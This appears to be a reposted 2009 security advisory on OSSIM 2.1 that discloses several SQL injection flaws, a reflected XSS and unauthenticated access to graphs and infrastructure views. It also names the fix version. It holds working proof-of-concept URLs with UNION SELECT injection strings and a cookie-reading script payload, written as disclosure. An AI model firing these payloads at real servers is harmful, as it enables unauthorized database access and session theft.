本文共 3395 字,大约阅读时间需要 11 分钟。
OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities.1. SQL Injections2. Linked XSS3. Unauthorized accessDigital Security Research Group [DSecRG] Advisory #DSECRG-09-055Application: OSSIMVersions Affected: 2.1 and may be 2.1.1Vendor URL: http://ossim.net/Bug: SQL Injection,XSS, Unauthorized accessExploits: YESReported: 07.09.2009Vendor response: 09.09.2009Solution: YES (version 2.1.2)Date of Public Advisory:21.09.2009Author: Sintsov Alexey of Digital Security Research Group [DSecRG]Details*******1.1 SQL injections in repositoryAttacker need to be authorized in system for success.Vulnerable script - repository_document.phpVulnerable parameter - id_documentExample*******http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3 union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=11.2 SQL injections in repositoryAttacker need to be authorized in system for success.Vulnerable script - repository_links.phpVulnerable parameter - id_documentExample*******http://OSSIM-SERVER/ossim/repository/repository_links.php?id_document=-3 union select 1,user(),3,4,5,61.3 SQL injections in repositoryAttacker need to be authorized in system for success.Vulnerable script - repository_editdocument.phpVulnerable parameter - id_documentExample*******http://OSSIM-SERVER/ossim/repository/repository_editdocument.php?id_document=-3 union select 1,user(),3,4,5,61.4 SQL injection in policy scriptsAttacker need to be authorized in system for success.Vulnerable script - getpolicy.phpVulnerable parameter - groupExample*******http://OSSIM-SERVER/ossim/policy/getpolicy.php?group=0 and 1=11.5 SQL injection in policy scriptsAttacker need to be authorized in system for success.Vulnerable script - newhostgroupform.phpVulnerable parameter - nameExample*******http://OSSIM-SERVER/ossim/host/newhostgroupform.php?name=' union select user(),'b','c','d','f1.6 SQL injection in policy scriptsAttacker need to be authorized in system for success.Vulnerable script - modifynetform.phpVulnerable parameter - nameExample*******http://OSSIM-SERVER/ossim/net/modifynetform.php?name=' union select user(),'b','c','d','e','f','g','h','aAnd others scripts in policy menu.2. Linked XSS in main menuVulnerable script /ossim/Vulnerable parameter - optionExample*******http://OSSIM-SERVER/ossim/?option=0" οnlοad=alert(document.cookie) a="3. Access to data without authentication.Unauthorized user can see graphs and infrastructureExample*******Access to the graph:http://OSSIM-SERVER/ossim/graphs/alarms_events.phpInternal infrastructure view:http://OSSIM-SERVER/ossim/host/draw_tree.phpFix Information***************Upgrade to version 2.1.2References**********http://www.alienvault.com/community.php?section=Newshttp://dsecrg.com/pages/vul/show.php?id=155About*****Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.Contact: research [at] dsecrg [dot] comhttp://www.dsecrg.com
转载地址:http://igmmb.baihongyu.com/